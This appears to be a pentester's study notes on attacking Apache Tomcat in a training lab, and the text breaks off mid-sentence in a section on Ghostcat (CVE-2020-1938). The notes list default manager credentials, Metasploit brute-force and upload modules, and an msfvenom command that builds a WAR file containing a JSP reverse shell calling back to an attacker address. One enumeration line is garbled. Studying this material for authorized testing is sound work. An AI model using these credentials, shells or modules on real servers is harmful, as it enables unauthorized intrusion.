Open-source web server that hosts applications written in Java. It is often less apt to be exposed to the internet, far more common to come across in internal pentests.

Discovery

Tomcat servers can be identified by the Server header in the HTTP response. But custom error pages may be in use that do not leak this version information.

Tomcat server and version can be detected via

curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat 

Some important files to look at are

  • tomcat-users.xml stores user credentials and their assigned roles. Also used to allow or disallow access to the /manager and host-manager admin pages.
  • webapps/WEB-INF/web.xml is the deployment descriptor which stores information about the routes used by the application and classes handling these routes
  • webapps/WEB-INF/classes are compiled classes used by the application that may contain business logic as well as sensitive information
  • webapps/WEB-INF/jsp contains the JavaServer Pages, which is equivalent to PHP files on an Apache server.
  • webapps/WEB-INF/web.xml defines a configuration.
    • If we define a servlet AdminServlet that is mapped to a com.inlanefreight.api.AdminServlet (Java uses a dot notation to create package names) giving a path of classes/com/inlanefreight/api/AdminServlet.class.
    • This file holds a lot of sensitive information and should be checked if an LFI vulnerability is found/

Enumeration

We’ll typically look for the /manager or `/ho/ry brute forcing tool.

We can login via default credentials tomcat:tomcat and admin:admin. We can also try brute force attack against the login page.

Attacking

We can brute force the login page via the auxiliary /scanner/http/tomcat_mgr_loginin Metasploit.

Tomcat installations will usually provide a GUI to manage the application available at /manager/html which only users assigned to the manager-gui role are allowed to access. Valid users can then upload a packaged Tomcat application (.war file) to compromise the application.

A WAR file can be created using zip of a JSP web shell. Metasploit also offers generation of WAR files.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.war

We can even automate the process with multi/http/tomcat_mgr_upload.

CVE-2020-1938: Ghostcat

Unauthenticated LFI was found in Tomcat versions <9.031, 8.5.51, 7.0.100. Caused by a misconfiguration of the AJP protocol used by Tomcat running on port 8009, used to proxy request to application servers behind the front-end web servers. The exploit can only read